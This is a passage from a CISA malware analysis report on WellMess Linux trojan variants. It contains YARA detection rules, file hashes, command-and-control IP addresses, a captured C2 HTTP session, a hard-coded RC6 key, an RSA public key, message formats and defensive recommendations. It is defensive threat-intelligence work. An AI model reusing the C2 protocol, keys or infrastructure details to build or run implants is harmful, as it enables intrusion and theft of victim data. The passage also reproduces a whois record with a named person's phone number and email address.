49152:T8FWH8y/gahO9FcIXKtqEJnerv41WHrFq44gP1T1WPmoFjPnMBKBJ2f+r9O1Ogg3:ooHdgaMX1JLFv1opfMABT\r\nEntropy 6.006374\r\nAntivirus\r\nAntiy Trojan/Linux.Agent\r\nAvira LINUX/Agent.vkmrr\r\nBitDefender Trojan.Linux.Generic.105878\r\nESET a variant of Linux/WellMess.B trojan\r\nEmsisoft Trojan.Linux.Generic.105878 (B)\r\nIkarus Trojan.Linux.Agent\r\nMcAfee GenericRXKJ-GH!2F9F4F2A9D43\r\nTrendMicro TROJ_FR.C35E7E37\r\nTrendMicro House Call TROJ_FR.C35E7E37\r\nYARA Rules\r\nrule CISA_10296782_01 : trojan WELLMESS\r\n{\r\nmeta:\r\n    Author = \"CISA Code \u0026 Media Analysis\"\r\n    Date= \"2020-07-06\"\r\n    Last_Modified=\"20200706_1017\"\r\n    Actor=\"n/a\"\r\n    
Category=\"Trojan\"\r\n    Family=\"WellMess\"\r\n    Description = \"Detects WellMess implant and SangFor Exploit\"\r\n    MD5_1 = \"4d38ac3319b167f6c8acb16b70297111\"\r\n    SHA256_1 = \"7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee\"\r\n    MD5_2 = \"a32e1202257a2945bf0f878c58490af8\"\r\n    SHA256_2 = \"a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064\"\r\n    MD5_3 = \"861879f402fe3080ab058c0c88536be4\"\r\n    SHA256_3 = \"14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2\"\r\n    MD5_4 = \"2f9f4f2a9d438cdc944f79bdf44a18f8\"\r\n    SHA256_4 = \"e329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09\"\r\n    MD5_5 = \"ae7a46529a0f74fb83beeb1ab2c68c5c\"\r\n    SHA256_5 = \"fd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950\"\r\n    MD5_6 = \"f18ced8772e9d1a640b8b4a731dfb6e0\"\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 33 of 44\n\nSHA256_6 = \"953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a\"\r\n    MD5_7 = \"3a9cdd8a5cbc3ab10ad64c4bb641b41f\"\r\n    SHA256_7 = \"5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb\"\r\n    MD5_8 = \"967fcf185634def5177f74b0f703bdc0\"\r\n    SHA256_8 = \"58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2\"\r\n    MD5_9 = \"c5d5cb99291fa4b2a68b5ea3ff9d9f9a\"\r\n    SHA256_9 = \"65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75\"\r\n    MD5_10 = \"01d322dcac438d2bb6bce2bae8d613cb\"\r\n    SHA256_10 = \"0c5ad1e8fe43583e279201cdb1046aea742bae59685e6da24e963a41df987494\"\r\n    MD5_11 = \"8777a9796565effa01b03cf1cea9d24d\"\r\n    SHA256_11 = \"83014ab5b3f63b0253cdab6d715f5988ac9014570fa4ab2b267c7cf9ba237d18\"\r\n    MD5_12 = \"507bb551bd7073f846760d8b357b7aa9\"\r\n    SHA256_12 = \"47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854\"\r\nstrings:\r\n    $0 = \"/home/ubuntu/GoProject/src/bot/botlib/chat.go\"\r\n    $1 = 
\"/home/ubuntu/GoProject/src/bot/botlib.Post\"\r\n    $2 = \"GoProject/src/bot/botlib.deleteFile\"\r\n    $3 = \"ubuntu/GoProject/src/bot/botlib.generateRandomString\"\r\n    $4 = \"GoProject/src/bot/botlib.AES_Decrypt\"\r\n    $5 = { 53 00 63 00 72 00 69 00 70 00 74 00 00 0F 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 00 07 2F 00 63 }\r\n    $6 = { 3C 00 6E 00 77 00 3E 00 2E 00 2A 00 29 00 00 0B 24 00 7B 00 66 00 6E 00 7D }\r\n    $7 = { 7B 00 61 00 72 00 67 00 7D 00 00 0B 24 00 7B 00 6E 00 77 00 7D }\r\n    $8 = { 52 61 6E 64 6F 6D 53 74 72 69 6E 67 00 44 65 6C 65 74 65 46 69 6C 65 }\r\n    $9 = \"get_keyRC6\"\r\n    $10 = { 7D A3 26 77 1D 63 3D 5A 32 B4 6F 1F 55 49 44 25 }\r\n    $11 = { 47 C2 2F 35 93 41 2F 55 73 0B C2 60 AB E1 2B 42 }\r\n    $12 = { 53 58 9B 17 1F 45 BD 72 EC 01 30 6C 4F CA 93 1D }\r\n    $13 = { 48 81 21 81 5F 53 3A 64 E0 ED FF 21 23 E5 00 12 }\r\n    $14 = \"GoProject/src/bot/botlib.wellMess\"\r\n    $15 = { 62 6F 74 6C 69 62 2E 4A 6F 69 6E 44 6E 73 43 68 75 6E 6B 73 }\r\n    $16 = { 62 6F 74 6C 69 62 2E 45 78 65 63 }\r\n    $17 = { 62 6F 74 6C 69 62 2E 47 65 74 52 61 6E 64 6F 6D 42 79 74 65 73 }\r\n    $18 = { 62 6F 74 6C 69 62 2E 4B 65 79 }\r\n    $19 = { 7F 16 21 9D 7B 03 CB D9 17 3B 9F 27 B3 DC 88 0F }\r\n    $20 = { D9 BD 0A 0E 90 10 B1 39 D0 C8 56 58 69 74 15 8B }\r\n    $21 = { 44 00 59 00 4A 00 20 00 36 00 47 00 73 00 62 00 59 00 31 00 2E }\r\n    $22 = { 6E 00 20 00 46 00 75 00 7A 00 2C 00 4B 00 5A 00 20 00 33 00 31 00 69 00 6A 00 75 }\r\n    $23 = { 43 00 31 00 69 00 76 00 66 00 39 00 32 00 20 00 56 00 37 00 6C 00 4F 00 48 }\r\n    $24 = { 66 69 6C 65 4E 61 6D 65 3A 28 3F 50 3C 66 6E 3E 2E 2A 3F 29 5C 73 61 72 67 73 3A 28 3F 50 3C 61\r\n72 67 3E 2E 2A 3F }\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 34 of 44\n\n$25 = { 5C 00 2E 00 53 00 61 00 6E 00 67 00 66 00 6F 00 72 00 55 00 44 00 2E 00 73 00 75 00 6D }\r\n    $26 = { 66 6F 72 6D 2D 64 61 74 61 3B 20 6E 61 6D 65 3D 22 5F 67 61 22 3B 20 66 69 6C 65 6E 61 6D 
65 3D }\r\n    $27 = { 40 5B 5E 5C 73 5D 2B 3F 5C 73 28 3F 50 3C 74 61 72 3E 2E 2A 3F 29 5C 73 27 }\r\ncondition:\r\n   ($0 and $1 and $2 and $3 and $4) or ($5 and $6 and $7 and $8 and $9) or ($10 and $11) or ($12 and $13) or ($14)\r\nor ($15 and $16 and $17 and $18) or ($19 and $20) or ($21 and $22 and $23) or ($24) or ($25 and $26) or ($27)\r\n}\r\nssdeep Matches\r\nNo matches found.\r\nRelationships\r\ne329607379... Connected_To 103.73.188.101\r\nDescription\r\nThis artifact is an ELF 64-bit written in Go. It has been identified as a variant of the WellMess malware family.\r\nWhen executed, it attempts to collect the following data from the victim's system:\r\n—Begin Data Collected—\r\nIP address of the victim system\r\nCurrent username\r\nDomain name\r\n—End Data Collected—\r\nThe data is stored in the following format:\r\n—Begin Format—\r\n\"200.200.200.150||root|root|e3b0c44298fc1c149afbf4c8996fb924\"\r\n—End Format—\r\nThe victim's system data is used to generate a unique identifier for the target system. This unique identifier is hexadecimal\r\nencoded and stored in the format below:\r\n—Begin Message Format—\r\n\"\r\n\u003c;head;\u003e3230302e3230302e3230302e3135307c7c726f6f747c726f6f74e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855/p\u003c;he\r\n\u003c;title;\u003ea:1_0\u003c;title;\u003e\u003c;service;\u003ep\u003c;service;\u003e\"\r\n—End Message Format—\r\nIn the message above, the hexadecimal string between the \u003chead\u003e delimiters is the original encoded string. Data between the\r\n\u003ctitle\u003e delimiters control the session, while data between the \u003cservice\u003e delimiters relate to commands. Some of the\r\ncommands include the following:\r\n—Begin Commands—\r\n(fu) File upload\r\n(fd) File download\r\n(u) Change user-agent string\r\n—End Commands—\r\nThe message above, is encrypted using a hard-coded RC6 key. 
This key is loaded using the function \"botlib.KeyRC6\".\r\nDisplayed below is the hard coded RC6 key used to encrypt the data:\r\n—Begin RC6 Key—\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 35 of 44\n\nOHVbn3Fdv/sgvP9VRO/9OQ==\r\n—End RC6 Key—\r\nThe encrypted data is encoded using the Base64 encoding function. It trims base64 \"=\" | \"/\" | \":\" and adds spaces with the\r\n\"botlib.Base64ToNormal\" function.\r\nDisplayed below is an example of how the Base64 encoded data is trimmed:\r\n—Begin Base64 encoded data—\r\nlSBUYfP7=sW93f+%2CKH+o%2CGNb+iL2o8jb+LWRTcTH+v20b+XP22L+bgli+B4E.+JaA+yVyKo+A%3Am+N8b+Hgf5+%3AzL69zU+2m8B+Azv\r\n6uDqNtIN=1.+9B7sUM+571cpj6+hfB+vdjukEY+xeS+iWSN+XbtVIB+4fxCCL.+a9el+eX90Q+hTImb+kE2pi+uV2XuDZj\r\n—End Base64 encoded data—\r\nThe final trimmed Base64 encoded data is stored in the Cookie header. The malware communicates with its C2 server at the\r\nIP address 103.73.188.101 using HTTP requests which are RSA-encrypted and Base64 encoded. The \"Cookie\" header will\r\ncontain the RC6 encrypted information, including the system unique identifier, mentioned above. The bottom of the message\r\nbody will contain a dynamically generated AES key which is encrypted utilizing a hard-coded public RSA key. The AES key\r\nwill be utilized to transfer C2 data between the remote operator and the malware, including executable scripts which are\r\nexecuted on the target system.\r\nAnalysis indicates that once a connection is established, the malware is designed to initiate a command and control service\r\nfrom the remote operator using the function \"botlib.Work\". 
It performs functions based on the received commands:\r\n—Begin Functions—\r\nFile upload\r\nFile download\r\nChange user-agent string\r\n—End Functions—\r\nThe following Public Key is used for secure communication with the C2:\r\n—Begin Public Key—\r\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqU3sMUB/SEWHNe8xNSFG\r\nDMylqo/BsMvI9OdNb3keEuW57nmFctMiecNZu9c+ZGYTWBSU07cbxU045tlFOprY\r\nnhbnnnjgEDA9JCA12CUIJ5L74ERo8FuBLC18FoL5QtBrXm65RdxxuP3CRghg0amR\r\nS5aFpW8p3kpdIINXsXasnjFBw+q009u7w6rDXkK2hrpIvF2fzIrs7DrRwwKJ2lCf\r\nxgnhY00UWHohjOj3ecQQJMn71puy94pCmpv+7zAyCiYYTNyhC29xUAH1j6aBAVKI\r\nkuBXqd6461MJkGNI0pdIUev9BDeK74B7vmZ6TbQrdQ27+bNVTg6qqai+6vwLFxUB\r\nBwIDAQAB\r\n—End Public Key—\r\n103.73.188.101\r\nTags\r\ncommand-and-control\r\nPorts\r\n80 TCP\r\nHTTP Sessions\r\nPOST / HTTP/1.1\r\nHost: 103.73.188.101\r\nUser-Agent: Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0\r\nContent-Length: 423\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 36 of 44\n\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\r\nCookie:\r\nlSBUYfP7=sW93f+%2CKH+o%2CGNb+iL2o8jb+LWRTcTH+v20b+XP22L+bgli+B4E.+JaA+yVyKo+A%3Am+N8b+Hgf5+%3AzL69zU+2m8\r\n6uDqNtIN=1.+9B7sUM+571cpj6+hfB+vdjukEY+xeS+iWSN+XbtVIB+4fxCCL.+a9el+eX90Q+hTImb+kE2pi+uV2XuDZj\r\nAccept-Encoding: gzip\r\nZ25gZ5A PuN nSBtz 5USoc 8HrEN9 DsA 2UqoV gUVciJ Ur3. RCa qNs lDr3FO vITG H69jRJ7 bfGbc8 UrO8tT\r\nLLaKll. uVuNP eKC 9uH pHy UY3G,w7 B7D6OR r:L CmaikCh. BYoOSbM aMIHrd L25LVy Gpd2jI8 kcW R98au\r\nEvcg HSFp0D9. tMg DhtzW 6Lh FuzXBD ypERa 2y:d0Bq uPnAw vyIvE. rp0LXY E6mW3E gUUJpf P1sRa9r\r\nriNN9g0 rXHfvl kly ZqZ:FB. ejr FpzCq Ey23 t0A PjPM fnlL jpr J4,0DPy. WyeM iMcK ahpo7 tIqNkH ,aYzcG\r\nOnawAk iRmPT :b0PIiN. 
2q: p1k5 nD5D6lg    \r\nWhois\r\nQueried whois.apnic.net with \"103.73.188.101\"...\r\n% Information related to '103.73.188.0 - 103.73.191.255'\r\n% Abuse contact for '103.73.188.0 - 103.73.191.255' is 'query@evokedigital.in'\r\ninetnum:        103.73.188.0 - 103.73.191.255\r\nnetname:        EVOKEDS\r\ndescr:         Evoke Digital Solutions\r\nadmin-c:        RK634-AP\r\ntech-c:         RK634-AP\r\ncountry:        IN\r\nmnt-by:         MAINT-IN-IRINN\r\nmnt-irt:        IRT-EVOKEDS-IN\r\nmnt-routes:     MAINT-IN-EVOKEDS\r\nstatus:         ASSIGNED PORTABLE\r\nlast-modified: 2016-08-30T11:20:02Z\r\nsource:         APNIC\r\nirt:            IRT-EVOKEDS-IN\r\naddress:        371, Jagjivan Ram Nagar, Patnipura,Indore,Madhya Pradesh-452001\r\ne-mail:         radhe@evokedigital.in\r\nabuse-mailbox: query@evokedigital.in\r\nadmin-c:        RK634-AP\r\ntech-c:         RK634-AP\r\nauth:         # Filtered\r\nmnt-by:         MAINT-IN-EVOKEDS\r\nlast-modified: 2016-08-30T11:13:51Z\r\nsource:         APNIC\r\nperson:         Rajat Keshriya\r\naddress:        371, Jagjivan Ram Nagar, Patnipura,Indore,Madhya Pradesh-452001\r\ncountry:        IN\r\nphone:         +91 9993099926\r\ne-mail:         radhe@evokedigital.in\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 37 of 44\n\nnic-hdl:        RK634-AP\r\nmnt-by:         MAINT-IN-EVOKEDS\r\nlast-modified: 2016-08-30T11:14:18Z\r\nsource:         APNIC\r\n% Information related to '103.73.188.0/24AS135752'\r\nroute:         103.73.188.0/24\r\ndescr:         Evoke Digital Solutions Route object\r\norigin:         AS135752\r\ncountry:        IN\r\nnotify:         radhe@evokedigital.in\r\nmnt-by:         MAINT-IN-IRINN\r\nmnt-routes:     MAINT-IN-EVOKEDS\r\nlast-modified: 2016-09-19T09:13:33Z\r\nsource:         APNIC\r\n% This query was served by the APNIC Whois Service version 1.88.15-SNAPSHOT (WHOIS-US3)\r\nRelationships\r\n103.73.188.101 Connected_From 
e329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09\r\n103.73.188.101 Connected_From 14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2\r\nDescription\r\ne329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09 and\r\n14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2 attempt to connect to the IP address.\r\n14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2\r\nTags\r\ntrojan\r\nDetails\r\nName 14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2\r\nSize 2430280 bytes\r\nType ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux)\r\nMD5 861879f402fe3080ab058c0c88536be4\r\nSHA1 db4f07ecefd1e290d727379ded4f15a0d4a59f88\r\nSHA256 14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2\r\nSHA512 dd2cb0f9f0c5fb985bfc58867399a72989606066b5d943b2074bf04769175f26c19a354bb7e012a74c54a772c86d5152c46f4617f6d84e49a552\r\nssdeep 49152:c+b/fDJqZxtZWU71nFqO8apKC9AS7aAZYgBEB:R38xtZ/71FqODKCn8\r\nEntropy 7.912054\r\nAntivirus\r\nAvira LINUX/Agent.pzcai\r\nBitDefender Trojan.Linux.GenericA.37725\r\nClamAV Unix.Malware.Agent-7376649-0\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 38 of 44\n\nESET a variant of Linux/WellMess.B trojan\r\nEmsisoft Trojan.Linux.GenericA.37725 (B)\r\nIkarus Trojan.Linux.Agent\r\nYARA Rules\r\nrule CISA_10296782_01 : trojan WELLMESS\r\n{\r\nmeta:\r\n    Author = \"CISA Code \u0026 Media Analysis\"\r\n    Date= \"2020-07-06\"\r\n    Last_Modified=\"20200706_1017\"\r\n    Actor=\"n/a\"\r\n    Category=\"Trojan\"\r\n    Family=\"WellMess\"\r\n    Description = \"Detects WellMess implant and SangFor Exploit\"\r\n    MD5_1 = \"4d38ac3319b167f6c8acb16b70297111\"\r\n    SHA256_1 = \"7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee\"\r\n    MD5_2 = \"a32e1202257a2945bf0f878c58490af8\"\r\n    SHA256_2 = \"a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064\"\r\n    MD5_3 = \"861879f402fe3080ab058c0c88536be4\"\r\n    SHA256_3 = 
\"14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2\"\r\n    MD5_4 = \"2f9f4f2a9d438cdc944f79bdf44a18f8\"\r\n    SHA256_4 = \"e329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09\"\r\n    MD5_5 = \"ae7a46529a0f74fb83beeb1ab2c68c5c\"\r\n    SHA256_5 = \"fd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950\"\r\n    MD5_6 = \"f18ced8772e9d1a640b8b4a731dfb6e0\"\r\n    SHA256_6 = \"953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a\"\r\n    MD5_7 = \"3a9cdd8a5cbc3ab10ad64c4bb641b41f\"\r\n    SHA256_7 = \"5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb\"\r\n    MD5_8 = \"967fcf185634def5177f74b0f703bdc0\"\r\n    SHA256_8 = \"58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2\"\r\n    MD5_9 = \"c5d5cb99291fa4b2a68b5ea3ff9d9f9a\"\r\n    SHA256_9 = \"65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75\"\r\n    MD5_10 = \"01d322dcac438d2bb6bce2bae8d613cb\"\r\n    SHA256_10 = \"0c5ad1e8fe43583e279201cdb1046aea742bae59685e6da24e963a41df987494\"\r\n    MD5_11 = \"8777a9796565effa01b03cf1cea9d24d\"\r\n    SHA256_11 = \"83014ab5b3f63b0253cdab6d715f5988ac9014570fa4ab2b267c7cf9ba237d18\"\r\n    MD5_12 = \"507bb551bd7073f846760d8b357b7aa9\"\r\n    SHA256_12 = \"47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854\"\r\nstrings:\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 39 of 44\n\n$0 = \"/home/ubuntu/GoProject/src/bot/botlib/chat.go\"\r\n    $1 = \"/home/ubuntu/GoProject/src/bot/botlib.Post\"\r\n    $2 = \"GoProject/src/bot/botlib.deleteFile\"\r\n    $3 = \"ubuntu/GoProject/src/bot/botlib.generateRandomString\"\r\n    $4 = \"GoProject/src/bot/botlib.AES_Decrypt\"\r\n    $5 = { 53 00 63 00 72 00 69 00 70 00 74 00 00 0F 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 00 07 2F 00 63 }\r\n    $6 = { 3C 00 6E 00 77 00 3E 00 2E 00 2A 00 29 00 00 0B 24 00 7B 00 66 00 6E 00 7D }\r\n    $7 = { 7B 00 61 00 72 00 67 00 7D 00 00 0B 24 00 7B 00 6E 00 77 00 7D }\r\n    
$8 = { 52 61 6E 64 6F 6D 53 74 72 69 6E 67 00 44 65 6C 65 74 65 46 69 6C 65 }\r\n    $9 = \"get_keyRC6\"\r\n    $10 = { 7D A3 26 77 1D 63 3D 5A 32 B4 6F 1F 55 49 44 25 }\r\n    $11 = { 47 C2 2F 35 93 41 2F 55 73 0B C2 60 AB E1 2B 42 }\r\n    $12 = { 53 58 9B 17 1F 45 BD 72 EC 01 30 6C 4F CA 93 1D }\r\n    $13 = { 48 81 21 81 5F 53 3A 64 E0 ED FF 21 23 E5 00 12 }\r\n    $14 = \"GoProject/src/bot/botlib.wellMess\"\r\n    $15 = { 62 6F 74 6C 69 62 2E 4A 6F 69 6E 44 6E 73 43 68 75 6E 6B 73 }\r\n    $16 = { 62 6F 74 6C 69 62 2E 45 78 65 63 }\r\n    $17 = { 62 6F 74 6C 69 62 2E 47 65 74 52 61 6E 64 6F 6D 42 79 74 65 73 }\r\n    $18 = { 62 6F 74 6C 69 62 2E 4B 65 79 }\r\n    $19 = { 7F 16 21 9D 7B 03 CB D9 17 3B 9F 27 B3 DC 88 0F }\r\n    $20 = { D9 BD 0A 0E 90 10 B1 39 D0 C8 56 58 69 74 15 8B }\r\n    $21 = { 44 00 59 00 4A 00 20 00 36 00 47 00 73 00 62 00 59 00 31 00 2E }\r\n    $22 = { 6E 00 20 00 46 00 75 00 7A 00 2C 00 4B 00 5A 00 20 00 33 00 31 00 69 00 6A 00 75 }\r\n    $23 = { 43 00 31 00 69 00 76 00 66 00 39 00 32 00 20 00 56 00 37 00 6C 00 4F 00 48 }\r\n    $24 = { 66 69 6C 65 4E 61 6D 65 3A 28 3F 50 3C 66 6E 3E 2E 2A 3F 29 5C 73 61 72 67 73 3A 28 3F 50 3C 61\r\n72 67 3E 2E 2A 3F }\r\n    $25 = { 5C 00 2E 00 53 00 61 00 6E 00 67 00 66 00 6F 00 72 00 55 00 44 00 2E 00 73 00 75 00 6D }\r\n    $26 = { 66 6F 72 6D 2D 64 61 74 61 3B 20 6E 61 6D 65 3D 22 5F 67 61 22 3B 20 66 69 6C 65 6E 61 6D 65 3D }\r\n    $27 = { 40 5B 5E 5C 73 5D 2B 3F 5C 73 28 3F 50 3C 74 61 72 3E 2E 2A 3F 29 5C 73 27 }\r\ncondition:\r\n   ($0 and $1 and $2 and $3 and $4) or ($5 and $6 and $7 and $8 and $9) or ($10 and $11) or ($12 and $13) or ($14)\r\nor ($15 and $16 and $17 and $18) or ($19 and $20) or ($21 and $22 and $23) or ($24) or ($25 and $26) or ($27)\r\n}\r\nssdeep Matches\r\nNo matches found.\r\nRelationships\r\n14e9b5e214... 
Connected_To 103.73.188.101\r\nDescription\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 40 of 44\n\nThis artifact is an Ultimate Packer for eXecutable (UPX) archive containing an ELF 64-bit file written in Go that supports\r\nKorean, Japanese, Traditional Chinese, and Simplified Chinese languages. It has been identified as a variant of the WellMess\r\nmalware family.\r\nThe program is capable of encrypting, decrypting, uploading and downloading files. It can also execute commands and send\r\nand receive encrypted messages. The following is a list of the malware’s capabilities:\r\n— Begin Bot Capabilities —\r\nbotlib.EncryptText\r\nbotlib.encrypt\r\nbotlib.Command\r\nbotlib.transformRighttBytes\r\nbotlib.reply\r\nbotlib.Service\r\nbotlib.saveFile\r\nbotlib.UDFile\r\nbotlib.Download\r\nbotlib.Send\r\nbotlib.Work\r\nbotlib.chunksM\r\nbotlib.Join\r\nbotlib.wellMess\r\nbotlib.RandStringBytes\r\nbotlib.GetRandomBytes\r\nbotlib.Key\r\nbotlib.GenerateSymmKey\r\nbotlib.CalculateMD5Hash\r\nbotlib.Transf\r\nbotlib.GetLocale\r\nbotlib.Parse\r\nbotlib.Pack\r\nbotlib.Unpack\r\nbotlib.UnpackB\r\nbotlib.FromNormalToBase64\r\nbotlib.RandInt\r\nbotlib.Base64ToNormal\r\nbotlib.KeySizeError.Error\r\nbotlib.New\r\nbotlib.(*rc6cipher).BlockSize\r\nbotlib.convertFromString\r\nbotlib.(*rc6cipher).Encrypt\r\nbotlib.(*rc6cipher).Decrypt\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 41 of 44\n\nbotlib.Split\r\nbotlib.Cipher\r\nbotlib.Decipher\r\nbotlib.Pad\r\nbotlib.AES_Encrypt\r\nbotlib.AES_Decrypt\r\nbotlib.generateRandomString\r\nbotlib.deleteFile\r\nbotlib.Post\r\nbotlib.SendMessage\r\nbotlib.ReceiveMessage\r\nbotlib.Send.func1\r\nbotlib.init\r\nbotlib.(*KeySizeError).Error\r\n— End Bot Capabilities —\r\nWhen the program is executed it will attempt to contact its C2 at the IP address, 103.73.188.101 over TCP port 80. The\r\nprogram collects the IP address of the victim system, current username, and domain to send to the C2. 
This data string is\r\nappended with a unique SHA256 hash. The completed string is then RC6 encrypted and then Base64 encoded. Non-random\r\ncharacters are interspersed into the Base64 string for further obfuscation. The following is an example of the encoded string:\r\n— Begin Encoded String Sample —\r\nHNX7A5nA=UUn5+2g6J+emwEU+MSkFqW+FAtoNc+dtFnr.+dHFn3ip+P8I+r19+B7s+UM571cp+j6hf+BvdjukE+YxeSiW.+SNXbt+VIB4fxC+CLa9e\r\n— End Encoded String Sample —\r\nThe string is used to uniquely identify communication to and from the C2. Messages are formatted in the following manner:\r\n— Begin Message Format —\r\n\u003c;head;\u003e3230302e3230302e3230302e3232317c7c757365727c75736572e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\u003c;he\r\n\u003c;title;\u003erc\u003c;title;\u003e\u003c;service;\u003e\u003c;service;\u003e\r\n— End Message Format —\r\nIn the message above the hexadecimal string between the \u003chead\u003e delimiters is the original encoded string. This string\r\ntranslates as the following:\r\n— Begin String Translate —\r\n200.200.200.221||user|user e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\r\n— End String Translate —\r\nData between the \u003ctitle\u003e delimiters control the session, while data between the \u003cservice\u003e delimiters relate to commands.\r\nSome of the commands include the following:\r\n— Begin Commands —\r\n(fu) File upload\r\n(fd) File download\r\n(u) Change user-agent string\r\n— End Commands —\r\nDuring each C2 session an AES key is dynamically generated. The AES key is encrypted via an embedded hard coded RSA\r\npublic key before being delivered to the remote operator / C2 server. 
This AES key will be utilized to secure C2 sessions.\r\nThe following Public Key is used for secure communication with the C2:\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 42 of 44\n\n—Begin Public Key—\r\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqU3sMUB/SEWHNe8xNSFG\r\nDMylqo/BsMvI9OdNb3keEuW57nmFctMiecNZu9c+ZGYTWBSU07cbxU045tlFOprY\r\nnhbnnnjgEDA9JCA12CUIJ5L74ERo8FuBLC18FoL5QtBrXm65RdxxuP3CRghg0amR\r\nS5aFpW8p3kpdIINXsXasnjFBw+q009u7w6rDXkK2hrpIvF2fzIrs7DrRwwKJ2lCf\r\nxgnhY00UWHohjOj3ecQQJMn71puy94pCmpv+7zAyCiYYTNyhC29xUAH1j6aBAVKI\r\nkuBXqd6461MJkGNI0pdIUev9BDeK74B7vmZ6TbQrdQ27+bNVTg6qqai+6vwLFxUB\r\nBwIDAQAB\r\n—End Public Key—\r\nRelationship Summary\r\n953b5fc997... Created 47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854\r\n47cdb87c27... Connected_To 85.93.2.116\r\n47cdb87c27... Created_By 953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a\r\n85.93.2.116 Connected_From 47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854\r\n5ca4a9f655... Connected_To 209.58.186.196\r\n5ca4a9f655... Connected_To 141.98.212.55\r\n141.98.212.55 Connected_From 5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb\r\n209.58.186.196 Connected_From 5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb\r\n7c39841ba4... Connected_To 192.48.88.107\r\n192.48.88.107 Connected_From 7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee\r\n192.48.88.107 Connected_From fd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950\r\nfd3969d323... Connected_To 192.48.88.107\r\ne329607379... Connected_To 103.73.188.101\r\n103.73.188.101 Connected_From e329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09\r\n103.73.188.101 Connected_From 14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2\r\n14e9b5e214... 
Connected_To 103.73.188.101\r\nRecommendations\r\nCISA recommends that users and administrators consider using the following best practices to strengthen the security\r\nposture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators\r\nprior to implementation to avoid unwanted impacts.\r\nMaintain up-to-date antivirus signatures and engines.\r\nKeep operating system patches up-to-date.\r\nDisable File and Printer sharing services. If these services are required, use strong passwords or Active Directory\r\nauthentication.\r\nRestrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local\r\nadministrators group unless required.\r\nEnforce a strong password policy and implement regular password changes.\r\nExercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be\r\nknown.\r\nEnable a personal firewall on agency workstations, configured to deny unsolicited connection requests.\r\nDisable unnecessary services on agency workstations and servers.\r\nScan for and remove suspicious e-mail attachments; ensure the scanned attachment is its \"true file type\" (i.e., the\r\nextension matches the file header).\r\nMonitor users' web browsing habits; restrict access to sites with unfavorable content.\r\nExercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).\r\nScan all software downloaded from the Internet prior to executing.\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 43 of 44\n\nMaintain situational awareness of the latest threats and implement appropriate Access Control Lists 